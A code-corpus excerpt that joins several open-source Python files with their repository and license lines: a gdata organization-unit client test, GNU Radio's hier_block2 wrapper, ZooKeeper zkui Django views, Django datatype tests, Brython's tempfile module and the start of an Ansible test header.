self.client = gdata.apps.organization.client.OrganizationUnitProvisioningClient(
domain=conf.options.get_value('appsdomain'))
if conf.options.get_value('ssl') == 'true':
self.client.ssl = True
conf.configure_client(self.client,
'OrganizationUnitProvisioningClientTest',
self.client.auth_service, True)
def tearDown(self):
conf.close_client(self.client)
def testClientConfiguration(self):
self.assertEqual('apps-apis.google.com', self.client.host)
self.assertEqual('2.0', self.client.api_version)
self.assertEqual('apps', self.client.auth_service)
self.assertEqual(
('https://apps-apis.google.com/a/feeds/user/',
'https://apps-apis.google.com/a/feeds/policies/',
'https://apps-apis.google.com/a/feeds/alias/',
'https://apps-apis.google.com/a/feeds/groups/'),
self.client.auth_scopes)
if conf.options.get_value('runlive') == 'true':
self.assertEqual(self.client.domain,
conf.options.get_value('appsdomain'))
else:
self.assertEqual(self.client.domain, 'example.com')
def testMakeCustomerIdFeedUri(self):
self.assertEqual('/a/feeds/customer/2.0/customerId',
self.client.MakeCustomerIdFeedUri())
def testMakeOrganizationUnitOrgunitProvisioningUri(self):
self.customer_id = 'tempo'
self.assertEqual('/a/feeds/orgunit/2.0/%s' % self.customer_id,
self.client.MakeOrganizationUnitOrgunitProvisioningUri(
self.customer_id))
self.assertEqual(
'/a/feeds/orgunit/2.0/%s/testing/Test+Test' % self.customer_id,
self.client.MakeOrganizationUnitOrgunitProvisioningUri(
self.customer_id, org_unit_path='testing/Test+Test'))
self.assertEqual(
'/a/feeds/orgunit/2.0/%s?get=all' % (self.customer_id),
self.client.MakeOrganizationUnitOrgunitProvisioningUri(
self.customer_id, params={'get': 'all'}))
def testMakeOrganizationUnitOrguserProvisioningUri(self):
self.customer_id = 'tempo'
self.assertEqual('/a/feeds/orguser/2.0/%s' % self.customer_id,
self.client.MakeOrganizationUnitOrguserProvisioningUri(
self.customer_id))
self.assertEqual(
'/a/feeds/orguser/2.0/%s/admin@example.com' % self.customer_id,
self.client.MakeOrganizationUnitOrguserProvisioningUri(
self.customer_id, org_user_email='admin@example.com'))
self.assertEqual(
'/a/feeds/orguser/2.0/%s?get=all' % (self.customer_id),
self.client.MakeOrganizationUnitOrguserProvisioningUri(
self.customer_id, params={'get': 'all'}))
def testCreateRetrieveUpdateDelete(self):
if not conf.options.get_value('runlive') == 'true':
return
# Either load the recording or prepare to make a live request.
conf.configure_cache(self.client, 'testCreateRetrieveUpdateDelete')
customer_id = self.client.RetrieveCustomerId().GetCustomerId()
rnd_number = random.randrange(0, 100001)
org_unit_name = 'test_org_unit_name%s' % (rnd_number)
org_unit_description = 'test_org_unit_description%s' % (rnd_number)
org_unit_path = org_unit_name
new_entry = self.client.CreateOrgUnit(customer_id, org_unit_name,
parent_org_unit_path='/',
description=org_unit_description,
block_inheritance=False)
self.assert_(isinstance(new_entry,
gdata.apps.organization.data.OrgUnitEntry))
self.assertEquals(new_entry.org_unit_path, org_unit_path)
entry = self.client.RetrieveOrgUnit(customer_id, org_unit_path)
self.assert_(isinstance(entry,
gdata.apps.organization.data.OrgUnitEntry))
self.assertEquals(entry.org_unit_name, org_unit_name)
self.assertEquals(entry.org_unit_description, org_unit_description)
self.assertEquals(entry.parent_org_unit_path, '')
self.assertEquals(entry.org_unit_path, org_unit_path)
self.assertEquals(entry.org_unit_block_inheritance, 'false')
self.client.DeleteOrgUnit(customer_id, org_unit_name)
def suite():
return conf.build_suite([OrganizationUnitProvisioningClientTest])
if __name__ == '__main__':
unittest.TextTestRunner().run(suite())
|
apache-2.0
|
jarn0ld/gnuradio
|
gnuradio-runtime/python/gnuradio/gr/hier_block2.py
|
34
|
5656
|
#
# Copyright 2006,2007,2014 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import functools
from runtime_swig import hier_block2_swig, dot_graph
import pmt
def _multiple_endpoints(func):
@functools.wraps(func)
def wrapped(self, *points):
if not points:
raise ValueError("At least one block required for " + func.__name__)
elif len(points) == 1:
try:
block = points[0].to_basic_block()
except AttributeError:
raise ValueError("At least two endpoints required for " + func.__name__)
func(self, block)
else:
try:
endp = [(p.to_basic_block(), 0) if hasattr(p, 'to_basic_block')
else (p[0].to_basic_block(), p[1]) for p in points]
except (ValueError, TypeError, AttributeError) as err:
raise ValueError("Unable to coerce endpoints: " + str(err))
for (src, src_port), (dst, dst_port) in zip(endp, endp[1:]):
func(self, src, src_port, dst, dst_port)
return wrapped
def _optional_endpoints(func):
@functools.wraps(func)
def wrapped(self, src, srcport, dst=None, dstport=None):
if dst is None and dstport is None:
try:
(src, srcport), (dst, dstport) = src, srcport
except (ValueError, TypeError) as err:
raise ValueError("Unable to coerce endpoints: " + str(err))
func(self, src.to_basic_block(), srcport, dst.to_basic_block(), dstport)
return wrapped
# This makes a 'has-a' relationship to look like an 'is-a' one.
#
# It allows Python classes to subclass this one, while passing through
# method calls to the C++ class shared pointer from SWIG.
#
# It also allows us to intercept method calls if needed
#
class hier_block2(object):
"""
Subclass this to create a python hierarchical block.
This is a python wrapper around the C++ hierarchical block implementation.
Provides convenience functions and allows proper Python subclassing.
"""
def __init__(self, name, input_signature, output_signature):
"""
Create a hierarchical block with a given name and I/O signatures.
"""
self._impl = hier_block2_swig(name, input_signature, output_signature)
def __getattr__(self, name):
"""
Pass-through member requests to the C++ object.
"""
if not hasattr(self, "_impl"):
raise RuntimeError(
"{0}: invalid state -- did you forget to call {0}.__init__ in "
"a derived class?".format(self.__class__.__name__))
return getattr(self._impl, name)
# FIXME: these should really be implemented
# in the original C++ class (gr_hier_block2), then they would all be inherited here
@_multiple_endpoints
def connect(self, *args):
"""
Connect two or more block endpoints. An endpoint is either a (block, port)
tuple or a block instance. In the latter case, the port number is assumed
to be zero.
To connect the hierarchical block external inputs or outputs to internal block
inputs or outputs, use 'self' in the connect call.
If multiple arguments are provided, connect will attempt to wire them in series,
interpreting the endpoints as inputs or outputs as appropriate.
"""
self.primitive_connect(*args)
@_multiple_endpoints
def disconnect(self, *args):
"""
Disconnect two or more endpoints in the flowgraph.
To disconnect the hierarchical block external inputs or outputs to internal block
inputs or outputs, use 'self' in the connect call.
If more than two arguments are provided, they are disconnected successively.
"""
self.primitive_disconnect(*args)
@_optional_endpoints
def msg_connect(self, *args):
"""
Connect two message ports in the flowgraph.
If only two arguments are provided, they must be endpoints (block, port)
"""
self.primitive_msg_connect(*args)
@_optional_endpoints
def msg_disconnect(self, *args):
"""
Disconnect two message ports in the flowgraph.
If only two arguments are provided, they must be endpoints (block, port)
"""
self.primitive_msg_disconnect(*args)
def message_port_register_hier_in(self, portname):
"""
Register a message port for this hier block
"""
self.primitive_message_port_register_hier_in(pmt.intern(portname))
def message_port_register_hier_out(self, portname):
"""
Register a message port for this hier block
"""
self.primitive_message_port_register_hier_out(pmt.intern(portname))
def dot_graph(self):
"""
Return graph representation in dot language
"""
return dot_graph(self._impl)
|
gpl-3.0
|
jerry-sc/zookeeper-learning
|
src/contrib/huebrowser/zkui/src/zkui/views.py
|
114
|
4712
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from desktop.lib.django_util import render
from django.http import Http404
from zkui import settings
from zkui.stats import ZooKeeperStats
from zkui.rest import ZooKeeper
from zkui.utils import get_cluster_or_404
from zkui.forms import CreateZNodeForm, EditZNodeForm
def _get_global_overview():
overview = []
for c in settings.CLUSTERS:
overview.append(_get_overview(c))
return overview
def _get_overview(cluster):
stats = {}
for s in cluster['hostport'].split(','):
host, port = map(str.strip, s.split(':'))
zks = ZooKeeperStats(host, port)
stats[s] = zks.get_stats() or {}
cluster['stats'] = stats
return cluster
def _group_stats_by_role(cluster):
leader, followers = None, []
for host, stats in cluster['stats'].items():
stats['host'] = host
if stats.get('zk_server_state') == 'leader':
leader = stats
elif stats.get('zk_server_state') == 'follower':
followers.append(stats)
return leader, followers
def index(request):
overview = _get_global_overview()
return render('index.mako', request,
dict(overview=overview))
def view(request, id):
cluster = get_cluster_or_404(id)
cluster = _get_overview(cluster)
leader, followers = _group_stats_by_role(cluster)
return render('view.mako', request,
dict(cluster=cluster, leader=leader, followers=followers))
def clients(request, host):
parts = host.split(':')
if len(parts) != 2:
raise Http404
host, port = parts
zks = ZooKeeperStats(host, port)
clients = zks.get_clients()
return render('clients.mako', request,
dict(host=host, port=port, clients=clients))
def tree(request, id, path):
cluster = get_cluster_or_404(id)
zk = ZooKeeper(cluster['rest_gateway'])
znode = zk.get(path)
children = sorted(zk.get_children_paths(path))
return render('tree.mako', request,
dict(cluster=cluster, path=path, \
znode=znode, children=children))
def delete(request, id, path):
cluster = get_cluster_or_404(id)
if request.method == 'POST':
zk = ZooKeeper(cluster['rest_gateway'])
try:
zk.recursive_delete(path)
except ZooKeeper.NotFound:
pass
return tree(request, id, path[:path.rindex('/')] or '/')
def create(request, id, path):
cluster = get_cluster_or_404(id)
if request.method == 'POST':
form = CreateZNodeForm(request.POST)
if form.is_valid():
zk = ZooKeeper(cluster['rest_gateway'])
full_path = ("%s/%s" % (path, form.cleaned_data['name']))\
.replace('//', '/')
zk.create(full_path, \
form.cleaned_data['data'], \
sequence = form.cleaned_data['sequence'])
return tree(request, id, path)
else:
form = CreateZNodeForm()
return render('create.mako', request,
dict(path=path, form=form))
def edit_as_base64(request, id, path):
cluster = get_cluster_or_404(id)
zk = ZooKeeper(cluster['rest_gateway'])
node = zk.get(path)
if request.method == 'POST':
form = EditZNodeForm(request.POST)
if form.is_valid():
# TODO is valid base64 string?
data = form.cleaned_data['data'].decode('base64')
zk.set(path, data, form.cleaned_data['version'])
return tree(request, id, path)
else:
form = EditZNodeForm(dict(\
data=node.get('data64', ''),
version=node.get('version', '-1')))
return render('edit.mako', request,
dict(path=path, form=form))
def edit_as_text(request, id, path):
cluster = get_cluster_or_404(id)
zk = ZooKeeper(cluster['rest_gateway'])
node = zk.get(path)
if request.method == 'POST':
form = EditZNodeForm(request.POST)
if form.is_valid():
zk.set(path, form.cleaned_data['data'])
return tree(request, id, path)
else:
form = EditZNodeForm(dict(data=node.get('data64', '')\
.decode('base64').strip(),
version=node.get('version', '-1')))
return render('edit.mako', request,
dict(path=path, form=form))
|
apache-2.0
|
jonashaag/django-nonrel-nohistory
|
tests/regressiontests/datatypes/tests.py
|
50
|
4250
|
import datetime
from django.conf import settings
from django.db import DEFAULT_DB_ALIAS
from django.test import TestCase, skipIfDBFeature
from django.utils import tzinfo
from models import Donut, RumBaba
class DataTypesTestCase(TestCase):
def test_boolean_type(self):
d = Donut(name='Apple Fritter')
self.assertFalse(d.is_frosted)
self.assertTrue(d.has_sprinkles is None)
d.has_sprinkles = True
self.assertTrue(d.has_sprinkles)
d.save()
d2 = Donut.objects.get(name='Apple Fritter')
self.assertFalse(d2.is_frosted)
self.assertTrue(d2.has_sprinkles)
def test_date_type(self):
d = Donut(name='Apple Fritter')
d.baked_date = datetime.date(year=1938, month=6, day=4)
d.baked_time = datetime.time(hour=5, minute=30)
d.consumed_at = datetime.datetime(year=2007, month=4, day=20, hour=16, minute=19, second=59)
d.save()
d2 = Donut.objects.get(name='Apple Fritter')
self.assertEqual(d2.baked_date, datetime.date(1938, 6, 4))
self.assertEqual(d2.baked_time, datetime.time(5, 30))
self.assertEqual(d2.consumed_at, datetime.datetime(2007, 4, 20, 16, 19, 59))
def test_time_field(self):
#Test for ticket #12059: TimeField wrongly handling datetime.datetime object.
d = Donut(name='Apple Fritter')
d.baked_time = datetime.datetime(year=2007, month=4, day=20, hour=16, minute=19, second=59)
d.save()
d2 = Donut.objects.get(name='Apple Fritter')
self.assertEqual(d2.baked_time, datetime.time(16, 19, 59))
def test_year_boundaries(self):
"""Year boundary tests (ticket #3689)"""
d = Donut.objects.create(name='Date Test 2007',
baked_date=datetime.datetime(year=2007, month=12, day=31),
consumed_at=datetime.datetime(year=2007, month=12, day=31, hour=23, minute=59, second=59))
d1 = Donut.objects.create(name='Date Test 2006',
baked_date=datetime.datetime(year=2006, month=1, day=1),
consumed_at=datetime.datetime(year=2006, month=1, day=1))
self.assertEqual("Date Test 2007",
Donut.objects.filter(baked_date__year=2007)[0].name)
self.assertEqual("Date Test 2006",
Donut.objects.filter(baked_date__year=2006)[0].name)
d2 = Donut.objects.create(name='Apple Fritter',
consumed_at = datetime.datetime(year=2007, month=4, day=20, hour=16, minute=19, second=59))
self.assertEqual([u'Apple Fritter', u'Date Test 2007'],
list(Donut.objects.filter(consumed_at__year=2007).order_by('name').values_list('name', flat=True)))
self.assertEqual(0, Donut.objects.filter(consumed_at__year=2005).count())
self.assertEqual(0, Donut.objects.filter(consumed_at__year=2008).count())
def test_textfields_unicode(self):
"""Regression test for #10238: TextField values returned from the
database should be unicode."""
d = Donut.objects.create(name=u'Jelly Donut', review=u'Outstanding')
newd = Donut.objects.get(id=d.id)
self.assertTrue(isinstance(newd.review, unicode))
@skipIfDBFeature('supports_timezones')
def test_error_on_timezone(self):
"""Regression test for #8354: the MySQL and Oracle backends should raise
an error if given a timezone-aware datetime object."""
dt = datetime.datetime(2008, 8, 31, 16, 20, tzinfo=tzinfo.FixedOffset(0))
d = Donut(name='Bear claw', consumed_at=dt)
self.assertRaises(ValueError, d.save)
# ValueError: MySQL backend does not support timezone-aware datetimes.
def test_datefield_auto_now_add(self):
"""Regression test for #10970, auto_now_add for DateField should store
a Python datetime.date, not a datetime.datetime"""
b = RumBaba.objects.create()
# Verify we didn't break DateTimeField behavior
self.assertTrue(isinstance(b.baked_timestamp, datetime.datetime))
# We need to test this this way because datetime.datetime inherits
# from datetime.date:
self.assertTrue(isinstance(b.baked_date, datetime.date) and not isinstance(b.baked_date, datetime.datetime))
|
bsd-3-clause
|
40323144/2015cdb_g7
|
static/Brython3.1.1-20150328-091302/Lib/tempfile.py
|
728
|
22357
|
"""Temporary files.
This module provides generic, low- and high-level interfaces for
creating temporary files and directories. The interfaces listed
as "safe" just below can be used without fear of race conditions.
Those listed as "unsafe" cannot, and are provided for backward
compatibility only.
This module also provides some data items to the user:
TMP_MAX - maximum number of names that will be tried before
giving up.
tempdir - If this is set to a string before the first use of
any routine from this module, it will be considered as
another candidate location to store temporary files.
"""
__all__ = [
"NamedTemporaryFile", "TemporaryFile", # high level safe interfaces
"SpooledTemporaryFile", "TemporaryDirectory",
"mkstemp", "mkdtemp", # low level safe interfaces
"mktemp", # deprecated unsafe interface
"TMP_MAX", "gettempprefix", # constants
"tempdir", "gettempdir"
]
# Imports.
import warnings as _warnings
import sys as _sys
import io as _io
import os as _os
import errno as _errno
from random import Random as _Random
try:
import fcntl as _fcntl
except ImportError:
def _set_cloexec(fd):
pass
else:
def _set_cloexec(fd):
try:
flags = _fcntl.fcntl(fd, _fcntl.F_GETFD, 0)
except OSError:
pass
else:
# flags read successfully, modify
flags |= _fcntl.FD_CLOEXEC
_fcntl.fcntl(fd, _fcntl.F_SETFD, flags)
try:
import _thread
except ImportError:
import _dummy_thread as _thread
_allocate_lock = _thread.allocate_lock
_text_openflags = _os.O_RDWR | _os.O_CREAT | _os.O_EXCL
if hasattr(_os, 'O_NOINHERIT'):
_text_openflags |= _os.O_NOINHERIT
if hasattr(_os, 'O_NOFOLLOW'):
_text_openflags |= _os.O_NOFOLLOW
_bin_openflags = _text_openflags
if hasattr(_os, 'O_BINARY'):
_bin_openflags |= _os.O_BINARY
if hasattr(_os, 'TMP_MAX'):
TMP_MAX = _os.TMP_MAX
else:
TMP_MAX = 10000
# Although it does not have an underscore for historical reasons, this
# variable is an internal implementation detail (see issue 10354).
template = "tmp"
# Internal routines.
_once_lock = _allocate_lock()
if hasattr(_os, "lstat"):
_stat = _os.lstat
elif hasattr(_os, "stat"):
_stat = _os.stat
else:
# Fallback. All we need is something that raises OSError if the
# file doesn't exist.
def _stat(fn):
f = open(fn)
f.close()
def _exists(fn):
try:
_stat(fn)
except OSError:
return False
else:
return True
class _RandomNameSequence:
"""An instance of _RandomNameSequence generates an endless
sequence of unpredictable strings which can safely be incorporated
into file names. Each string is six characters long. Multiple
threads can safely use the same instance at the same time.
_RandomNameSequence is an iterator."""
characters = "abcdefghijklmnopqrstuvwxyz0123456789_"
@property
def rng(self):
cur_pid = _os.getpid()
if cur_pid != getattr(self, '_rng_pid', None):
self._rng = _Random()
self._rng_pid = cur_pid
return self._rng
def __iter__(self):
return self
def __next__(self):
c = self.characters
choose = self.rng.choice
letters = [choose(c) for dummy in "123456"]
return ''.join(letters)
def _candidate_tempdir_list():
"""Generate a list of candidate temporary directories which
_get_default_tempdir will try."""
dirlist = []
# First, try the environment.
for envname in 'TMPDIR', 'TEMP', 'TMP':
dirname = _os.getenv(envname)
if dirname: dirlist.append(dirname)
# Failing that, try OS-specific locations.
if _os.name == 'nt':
dirlist.extend([ r'c:\temp', r'c:\tmp', r'\temp', r'\tmp' ])
else:
dirlist.extend([ '/tmp', '/var/tmp', '/usr/tmp' ])
# As a last resort, the current directory.
try:
dirlist.append(_os.getcwd())
except (AttributeError, OSError):
dirlist.append(_os.curdir)
return dirlist
def _get_default_tempdir():
"""Calculate the default directory to use for temporary files.
This routine should be called exactly once.
We determine whether or not a candidate temp dir is usable by
trying to create and write to a file in that directory. If this
is successful, the test file is deleted. To prevent denial of
service, the name of the test file must be randomized."""
namer = _RandomNameSequence()
dirlist = _candidate_tempdir_list()
for dir in dirlist:
if dir != _os.curdir:
dir = _os.path.normcase(_os.path.abspath(dir))
# Try only a few names per directory.
for seq in range(100):
name = next(namer)
filename = _os.path.join(dir, name)
try:
fd = _os.open(filename, _bin_openflags, 0o600)
try:
try:
with _io.open(fd, 'wb', closefd=False) as fp:
fp.write(b'blat')
finally:
_os.close(fd)
finally:
_os.unlink(filename)
return dir
except FileExistsError:
pass
except OSError:
break # no point trying more names in this directory
raise FileNotFoundError(_errno.ENOENT,
"No usable temporary directory found in %s" %
dirlist)
_name_sequence = None
def _get_candidate_names():
"""Common setup sequence for all user-callable interfaces."""
global _name_sequence
if _name_sequence is None:
_once_lock.acquire()
try:
if _name_sequence is None:
_name_sequence = _RandomNameSequence()
finally:
_once_lock.release()
return _name_sequence
def _mkstemp_inner(dir, pre, suf, flags):
"""Code common to mkstemp, TemporaryFile, and NamedTemporaryFile."""
names = _get_candidate_names()
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, pre + name + suf)
try:
fd = _os.open(file, flags, 0o600)
_set_cloexec(fd)
return (fd, _os.path.abspath(file))
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
# already exists on windows.
if _os.name == 'nt':
continue
else:
raise
raise FileExistsError(_errno.EEXIST,
"No usable temporary file name found")
# User visible interfaces.
def gettempprefix():
"""Accessor for tempdir.template."""
return template
tempdir = None
def gettempdir():
"""Accessor for tempfile.tempdir."""
global tempdir
if tempdir is None:
_once_lock.acquire()
try:
if tempdir is None:
tempdir = _get_default_tempdir()
finally:
_once_lock.release()
return tempdir
def mkstemp(suffix="", prefix=template, dir=None, text=False):
"""User-callable function to create and return a unique temporary
file. The return value is a pair (fd, name) where fd is the
file descriptor returned by os.open, and name is the filename.
If 'suffix' is specified, the file name will end with that suffix,
otherwise there will be no suffix.
If 'prefix' is specified, the file name will begin with that prefix,
otherwise a default prefix is used.
If 'dir' is specified, the file will be created in that directory,
otherwise a default directory is used.
If 'text' is specified and true, the file is opened in text
mode. Else (the default) the file is opened in binary mode. On
some operating systems, this makes no difference.
The file is readable and writable only by the creating user ID.
If the operating system uses permission bits to indicate whether a
file is executable, the file is executable by no one. The file
descriptor is not inherited by children of this process.
Caller is responsible for deleting the file when done with it.
"""
if dir is None:
dir = gettempdir()
if text:
flags = _text_openflags
else:
flags = _bin_openflags
return _mkstemp_inner(dir, prefix, suffix, flags)
def mkdtemp(suffix="", prefix=template, dir=None):
"""User-callable function to create and return a unique temporary
directory. The return value is the pathname of the directory.
Arguments are as for mkstemp, except that the 'text' argument is
not accepted.
The directory is readable, writable, and searchable only by the
creating user.
Caller is responsible for deleting the directory when done with it.
"""
if dir is None:
dir = gettempdir()
names = _get_candidate_names()
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
try:
_os.mkdir(file, 0o700)
return file
except FileExistsError:
continue # try again
raise FileExistsError(_errno.EEXIST,
"No usable temporary directory name found")
def mktemp(suffix="", prefix=template, dir=None):
"""User-callable function to return a unique temporary file name. The
file is not created.
Arguments are as for mkstemp, except that the 'text' argument is
not accepted.
This function is unsafe and should not be used. The file name
refers to a file that did not exist at some point, but by the time
you get around to creating it, someone else may have beaten you to
the punch.
"""
## from warnings import warn as _warn
## _warn("mktemp is a potential security risk to your program",
## RuntimeWarning, stacklevel=2)
if dir is None:
dir = gettempdir()
names = _get_candidate_names()
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
if not _exists(file):
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary filename found")
class _TemporaryFileWrapper:
"""Temporary file wrapper
This class provides a wrapper around files opened for
temporary use. In particular, it seeks to automatically
remove the file when it is no longer needed.
"""
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.close_called = False
self.delete = delete
def __getattr__(self, name):
# Attribute lookups are delegated to the underlying file
# and cached for non-numeric results
# (i.e. methods are cached, closed and friends are not)
file = self.__dict__['file']
a = getattr(file, name)
if not isinstance(a, int):
setattr(self, name, a)
return a
# The underlying __enter__ method returns the wrong object
# (self.file) so override it to return the wrapper
def __enter__(self):
self.file.__enter__()
return self
# iter() doesn't use __getattr__ to find the __iter__ method
def __iter__(self):
return iter(self.file)
# NT provides delete-on-close as a primitive, so we don't need
# the wrapper to do anything special. We still use it so that
# file.name is useful (i.e. not "(fdopen)") with NamedTemporaryFile.
if _os.name != 'nt':
# Cache the unlinker so we don't get spurious errors at
# shutdown when the module-level "os" is None'd out. Note
# that this must be referenced as self.unlink, because the
# name TemporaryFileWrapper may also get None'd out before
# __del__ is called.
unlink = _os.unlink
def close(self):
if not self.close_called:
self.close_called = True
self.file.close()
if self.delete:
self.unlink(self.name)
def __del__(self):
self.close()
# Need to trap __exit__ as well to ensure the file gets
# deleted when used in a with statement
def __exit__(self, exc, value, tb):
result = self.file.__exit__(exc, value, tb)
self.close()
return result
else:
def __exit__(self, exc, value, tb):
self.file.__exit__(exc, value, tb)
def NamedTemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix="", prefix=template,
dir=None, delete=True):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
'delete' -- whether the file is deleted on close (default True).
The file is created as mkstemp() would do it.
Returns an object with a file-like interface; the name of the file
is accessible as file.name. The file will be automatically deleted
when it is closed unless the 'delete' argument is set to False.
"""
if dir is None:
dir = gettempdir()
flags = _bin_openflags
# Setting O_TEMPORARY in the flags causes the OS to delete
# the file when it is closed. This is only supported by Windows.
if _os.name == 'nt' and delete:
flags |= _os.O_TEMPORARY
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags)
file = _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
return _TemporaryFileWrapper(file, name, delete)
if _os.name != 'posix' or _os.sys.platform == 'cygwin':
# On non-POSIX and Cygwin systems, assume that we cannot unlink a file
# while it is open.
TemporaryFile = NamedTemporaryFile
else:
def TemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix="", prefix=template,
dir=None):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
The file is created as mkstemp() would do it.
Returns an object with a file-like interface. The file has no
name, and will cease to exist when it is closed.
"""
if dir is None:
dir = gettempdir()
flags = _bin_openflags
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags)
try:
_os.unlink(name)
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
class SpooledTemporaryFile:
"""Temporary file wrapper, specialized to switch from BytesIO
or StringIO to a real file when it exceeds a certain size or
when a fileno is needed.
"""
_rolled = False
def __init__(self, max_size=0, mode='w+b', buffering=-1,
encoding=None, newline=None,
suffix="", prefix=template, dir=None):
if 'b' in mode:
self._file = _io.BytesIO()
else:
# Setting newline="\n" avoids newline translation;
# this is important because otherwise on Windows we'd
# hget double newline translation upon rollover().
self._file = _io.StringIO(newline="\n")
self._max_size = max_size
self._rolled = False
self._TemporaryFileArgs = {'mode': mode, 'buffering': buffering,
'suffix': suffix, 'prefix': prefix,
'encoding': encoding, 'newline': newline,
'dir': dir}
def _check(self, file):
if self._rolled: return
max_size = self._max_size
if max_size and file.tell() > max_size:
self.rollover()
def rollover(self):
if self._rolled: return
file = self._file
newfile = self._file = TemporaryFile(**self._TemporaryFileArgs)
del self._TemporaryFileArgs
newfile.write(file.getvalue())
newfile.seek(file.tell(), 0)
self._rolled = True
# The method caching trick from NamedTemporaryFile
# won't work here, because _file may change from a
# BytesIO/StringIO instance to a real file. So we list
# all the methods directly.
# Context management protocol
def __enter__(self):
if self._file.closed:
raise ValueError("Cannot enter context with closed file")
return self
def __exit__(self, exc, value, tb):
self._file.close()
# file protocol
def __iter__(self):
return self._file.__iter__()
def close(self):
self._file.close()
@property
def closed(self):
return self._file.closed
@property
def encoding(self):
try:
return self._file.encoding
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['encoding']
def fileno(self):
self.rollover()
return self._file.fileno()
def flush(self):
self._file.flush()
def isatty(self):
return self._file.isatty()
@property
def mode(self):
try:
return self._file.mode
except AttributeError:
return self._TemporaryFileArgs['mode']
@property
def name(self):
try:
return self._file.name
except AttributeError:
return None
@property
def newlines(self):
try:
return self._file.newlines
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['newline']
def read(self, *args):
return self._file.read(*args)
def readline(self, *args):
return self._file.readline(*args)
def readlines(self, *args):
return self._file.readlines(*args)
def seek(self, *args):
self._file.seek(*args)
@property
def softspace(self):
return self._file.softspace
def tell(self):
return self._file.tell()
def truncate(self, size=None):
if size is None:
self._file.truncate()
else:
if size > self._max_size:
self.rollover()
self._file.truncate(size)
def write(self, s):
file = self._file
rv = file.write(s)
self._check(file)
return rv
def writelines(self, iterable):
file = self._file
rv = file.writelines(iterable)
self._check(file)
return rv
class TemporaryDirectory(object):
"""Create and return a temporary directory. This has the same
behavior as mkdtemp but can be used as a context manager. For
example:
with TemporaryDirectory() as tmpdir:
...
Upon exiting the context, the directory and everything contained
in it are removed.
"""
def __init__(self, suffix="", prefix=template, dir=None):
self._closed = False
self.name = None # Handle mkdtemp raising an exception
self.name = mkdtemp(suffix, prefix, dir)
def __repr__(self):
return "<{} {!r}>".format(self.__class__.__name__, self.name)
def __enter__(self):
return self.name
def cleanup(self, _warn=False):
if self.name and not self._closed:
try:
self._rmtree(self.name)
except (TypeError, AttributeError) as ex:
# Issue #10188: Emit a warning on stderr
# if the directory could not be cleaned
# up due to missing globals
if "None" not in str(ex):
raise
print("ERROR: {!r} while cleaning up {!r}".format(ex, self,),
file=_sys.stderr)
return
self._closed = True
if _warn:
self._warn("Implicitly cleaning up {!r}".format(self),
ResourceWarning)
def __exit__(self, exc, value, tb):
self.cleanup()
def __del__(self):
# Issue a ResourceWarning if implicit cleanup needed
self.cleanup(_warn=True)
# XXX (ncoghlan): The following code attempts to make
# this class tolerant of the module nulling out process
# that happens during CPython interpreter shutdown
# Alas, it doesn't actually manage it. See issue #10188
_listdir = staticmethod(_os.listdir)
_path_join = staticmethod(_os.path.join)
_isdir = staticmethod(_os.path.isdir)
_islink = staticmethod(_os.path.islink)
_remove = staticmethod(_os.remove)
_rmdir = staticmethod(_os.rmdir)
_os_error = OSError
_warn = _warnings.warn
def _rmtree(self, path):
# Essentially a stripped down version of shutil.rmtree. We can't
# use globals because they may be None'ed out at shutdown.
for name in self._listdir(path):
fullname = self._path_join(path, name)
try:
isdir = self._isdir(fullname) and not self._islink(fullname)
except self._os_error:
isdir = False
if isdir:
self._rmtree(fullname)
else:
try:
self._remove(fullname)
except self._os_error:
pass
try:
self._rmdir(path)
except self._os_error:
pass
|
gpl-3.0
|
valentin-krasontovitsch/ansible
|
test/units/modules/network/ios/test_ios_logging.py
|
30
|
2538
|
#
# (c) 2016 Red Hat Inc.
# (c) 2017 Paul Neumann
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
